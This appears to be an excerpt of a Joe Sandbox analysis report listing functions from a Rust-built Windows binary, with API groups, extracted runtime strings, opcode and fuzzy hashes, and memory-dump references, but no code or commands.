                                                                                                        • String ID: RUST_MIN_STACK$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
                                                                                                        • API String ID: 120317985-141927316
                                                                                                        • Opcode ID: 0f8c8d6d44bdf13da51d5dcf1fcfebaabeed6e46b7a82eaca38d0b803038c235
                                                                                                        • Instruction ID: 714c501b5e9393e5069ae04c38167899a14e5837d6b4e56346bb04a80bbfa13f
                                                                                                        • Opcode Fuzzy Hash: 0f8c8d6d44bdf13da51d5dcf1fcfebaabeed6e46b7a82eaca38d0b803038c235
                                                                                                        • Instruction Fuzzy Hash: F9B16122A09A5286F731AF30D8813B9A7A0FB457A8F815535EE8D03796EF3CD585C371
                                                                                                        Function 00007FF79E96D44B Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN, xrefs: 00007FF79E96D4DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN
                                                                                                        • API String ID: 1475443563-2406371666
                                                                                                        • Opcode ID: 46757cf382599927a8d4a0aabcd9331590dbb94c894263678a18449331760e8c
                                                                                                        • Instruction ID: b04ba13847d37bdcfaad0248cd7dcf0e67524b1d4e1c0bce1bc60ed907b2ac5d
                                                                                                        • Opcode Fuzzy Hash: 46757cf382599927a8d4a0aabcd9331590dbb94c894263678a18449331760e8c
                                                                                                        • Instruction Fuzzy Hash: FF415D41E0CA4748F6307A36A9C06B89396AF12FA5FD46433DD1D86AD4DE5DE940F233
                                                                                                        Function 00007FF79E955E00 Relevance: 12.7, APIs: 10, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 1de102185da3bb913713fa39b87b29e93cb6e956dc5f28ed214f9f23d1630ec3
                                                                                                        • Instruction ID: 8f842958fefadff680d3f1c743b3000a995f12abac7de0e8f67e477aedf7f6f8
                                                                                                        • Opcode Fuzzy Hash: 1de102185da3bb913713fa39b87b29e93cb6e956dc5f28ed214f9f23d1630ec3
                                                                                                        • Instruction Fuzzy Hash: 51517121F0965256EB797B324690378E396AF45BA0FDC8035DD0D5B786DF2CF8824272
                                                                                                        Function 00007FF79E99D7A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryVirtual
                                                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                        • API String ID: 1804819252-1534286854
                                                                                                        • Opcode ID: 4fd57c9b88b693a7d41eaaea85bb8feca93a6b3e80787ddb801d584a8055ed59
                                                                                                        • Instruction ID: 68055fc8a180fdf4ba25d0455c6e5c97ca04aa4810047db30f668e8ee34d9414
                                                                                                        • Opcode Fuzzy Hash: 4fd57c9b88b693a7d41eaaea85bb8feca93a6b3e80787ddb801d584a8055ed59
                                                                                                        • Instruction Fuzzy Hash: 7C518672A0464686EA20AB21E4C0BB9F7A4FB85BA4FC44131DE4D077A5EE3CE481C771
                                                                                                        Function 00007FF79E93EE90 Relevance: 12.1, APIs: 8, Instructions: 127fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$ErrorFileLastSleepWritememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2935194761-0
                                                                                                        • Opcode ID: 84a19334c170eb9970b79e3f87816c357b347f6d007542bd8d5a5c74ef0ed9d4
                                                                                                        • Instruction ID: 78a6aefd24d87581f01cf79091dd9f3a4cc037c558d1d6bf213d888381d8eac6
                                                                                                        • Opcode Fuzzy Hash: 84a19334c170eb9970b79e3f87816c357b347f6d007542bd8d5a5c74ef0ed9d4
                                                                                                        • Instruction Fuzzy Hash: 7E519072A046C289E730BB359C817FAA394FF457E8F845531DD4D0ABD9DE7C91858322
                                                                                                        Function 00007FF79E937C60 Relevance: 12.1, APIs: 8, Instructions: 70networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Socket$HandleInformationclosesocketmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3407399761-0
                                                                                                        • Opcode ID: 9fae1a40f16f2f3957333c6efa841f139f9f280d079620cbfc37dba620905ab4
                                                                                                        • Instruction ID: 9454ef32b174c7e04595b36772e8a2943612cc7ecff42a6f005177fa0f8021f3
                                                                                                        • Opcode Fuzzy Hash: 9fae1a40f16f2f3957333c6efa841f139f9f280d079620cbfc37dba620905ab4
                                                                                                        • Instruction Fuzzy Hash: AD219131A082518AF730FA35D4853BAA7549B453F8FA44730ED6C57BC9EE2CAD428772
                                                                                                        Function 00007FF79E9693AE Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: SPSR_ABT$SPSR_FIQ$SPSR_IRQ$SPSR_SVC$SPSR_UND$TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI
                                                                                                        • API String ID: 1475443563-2082546588
                                                                                                        • Opcode ID: f5176a462027b55d940c15e46d0c21bb11bd80f3f09bc554bb613763e8c96442
                                                                                                        • Instruction ID: 77289cace8694b50340dbb4135be75ad65578652c6822c62d9acdd3332dbcb32
                                                                                                        • Opcode Fuzzy Hash: f5176a462027b55d940c15e46d0c21bb11bd80f3f09bc554bb613763e8c96442
                                                                                                        • Instruction Fuzzy Hash: 6F116366E0E99644EF302D7E64D03B483859F04FE5E945433CA4D9B3D0DD3DA8469277
                                                                                                        Function 00007FF79E929C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FF79E929FC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnvironmentVariable
                                                                                                        • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                                                        • API String ID: 2691138088-3632183283
                                                                                                        • Opcode ID: 0342860675461f0b20e08d9a2fdbebe81f3f7dcae1fddb8a0acb782e836da0a9
                                                                                                        • Instruction ID: b1fb704e21119b24679d231bae85116bf9979b9d26301722f622bcf670bcb91e
                                                                                                        • Opcode Fuzzy Hash: 0342860675461f0b20e08d9a2fdbebe81f3f7dcae1fddb8a0acb782e836da0a9
                                                                                                        • Instruction Fuzzy Hash: 75A19162A04BC189EB71AF35D8843E9A364FB04BA8F804135DE0C5BB96DF389691C361
                                                                                                        Function 00007FF79E949030 Relevance: 10.7, APIs: 7, Instructions: 183COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 1505103792-0
                                                                                                        • Opcode ID: 091fbfc0d1025629ac7bfcab3243749a7c457ddf6c8d41e819a665e241bcb062
                                                                                                        • Instruction ID: 56784022d28ce91bee38d9e48052a890ee31430b4fa05d05e8e32eda4f0089fe
                                                                                                        • Opcode Fuzzy Hash: 091fbfc0d1025629ac7bfcab3243749a7c457ddf6c8d41e819a665e241bcb062
                                                                                                        • Instruction Fuzzy Hash: E971D762B0469249FB35AB76D8853F9A365BF15BE8F804135DD1C57B86EF2CE2408331
                                                                                                        Function 00007FF79E93D280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Address$Wake$Single$ErrorLastWait
                                                                                                        • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                        • API String ID: 798958160-2333694755
                                                                                                        • Opcode ID: cd302619e39ff7fc371fd1f27c6b2ef57ef3d3f9db92bdbf5a41809f3225fba1
                                                                                                        • Instruction ID: cf611d221c9e7b94e30e5f65ec6654e00768178daf195cfd2430838f1abd2737
                                                                                                        • Opcode Fuzzy Hash: cd302619e39ff7fc371fd1f27c6b2ef57ef3d3f9db92bdbf5a41809f3225fba1
                                                                                                        • Instruction Fuzzy Hash: DA518432A0C69249EB31BF31A4903BEE7A0AB05768F845532DEAD477D1DE3CE5458372
                                                                                                        Function 00007FF79E936F80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs, xrefs: 00007FF79E937070
                                                                                                        • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF79E937088
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$getpeernamesetsockopt
                                                                                                        • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs
                                                                                                        • API String ID: 2225440259-513854611
                                                                                                        • Opcode ID: 1de7e30394ecb06c993386ffbd50f2dd2f8f3ca40c0a743f5185430f26c3a401
                                                                                                        • Instruction ID: 34bdb457f256c10a978cbd079e85356b63b29b7ace1a5b988b8f9ddcf865febf
                                                                                                        • Opcode Fuzzy Hash: 1de7e30394ecb06c993386ffbd50f2dd2f8f3ca40c0a743f5185430f26c3a401
                                                                                                        • Instruction Fuzzy Hash: F141C262D0869189F731AF74D4816FDB770EF44328F945125EA8C426A1FB3CA6D5C371
                                                                                                        Function 00007FF79E99D100 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                                                        • String ID: CCG
                                                                                                        • API String ID: 4122134289-1584390748
                                                                                                        • Opcode ID: bc36db872ceb928345c91abfb6f2972cdb890c3b47747cf1a9a99f09055b134a
                                                                                                        • Instruction ID: 83b5672866dc3b62bc2eb5a9bf53e3ae3a98743f5ea13f8ce89f4dc9860497d5
                                                                                                        • Opcode Fuzzy Hash: bc36db872ceb928345c91abfb6f2972cdb890c3b47747cf1a9a99f09055b134a
                                                                                                        • Instruction Fuzzy Hash: FA316272A08BC586E7209F24E4803A9B771FBD9788F909226DA8C13779DF79D1D1CB10
                                                                                                        Function 00007FF79E93B8E0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 307COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$AppData/Roaming/.ini$assertion failed: is_code_point_boundary(self, new_len)
                                                                                                        • API String ID: 3510742995-3583678413
                                                                                                        • Opcode ID: ed0b1ed9c4e76238d366cb2176a840bfc7e87afff67f0850cb94e2065038582c
                                                                                                        • Instruction ID: f03f4d71cb25c37d450b61feeff7dcb198224c526dd601468e4e81d80fd61db6
                                                                                                        • Opcode Fuzzy Hash: ed0b1ed9c4e76238d366cb2176a840bfc7e87afff67f0850cb94e2065038582c
                                                                                                        • Instruction Fuzzy Hash: A1B11E62F0865144FB21AB7298802FDA7617F55BD8F889431DE0E57796EE3CE981C331
                                                                                                        Function 00007FF79E952020 Relevance: 9.2, APIs: 6, Instructions: 249COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FullNamePathmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 674145353-0
                                                                                                        • Opcode ID: c86c17218d19c75a787743f085ae15f53dec54c9354b4f045dda96a06e434b5c
                                                                                                        • Instruction ID: 691336a1f1e86a45fd9651de42fff2aa99c790cf55db24b6d8edd4ca1a842cb3
                                                                                                        • Opcode Fuzzy Hash: c86c17218d19c75a787743f085ae15f53dec54c9354b4f045dda96a06e434b5c
                                                                                                        • Instruction Fuzzy Hash: 6EA19262B09B8245EB75AF71D8847B9A365BF49BE8F844035DE0C1B796DE3CD2408332
                                                                                                        Function 00007FF79E945CA0 Relevance: 9.2, APIs: 6, Instructions: 177COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Handle$CloseFinalNamePath
                                                                                                        • String ID:
                                                                                                        • API String ID: 3328380333-0
                                                                                                        • Opcode ID: ac542f6aeb0dd368a223a974bb57c6047cf7c84a79010d81bfdda12ef3d0f964
                                                                                                        • Instruction ID: 0a935b47d29e74b7bc3b3bd11523f0661100fe77a597333cad30a1d03b7b36d5
                                                                                                        • Opcode Fuzzy Hash: ac542f6aeb0dd368a223a974bb57c6047cf7c84a79010d81bfdda12ef3d0f964
                                                                                                        • Instruction Fuzzy Hash: BA61B362A057D249EB35BB7598943F9A355AF04BE8F908131DE1C5BBD6EE3CD2808331
                                                                                                        Function 00007FF79E956F20 Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
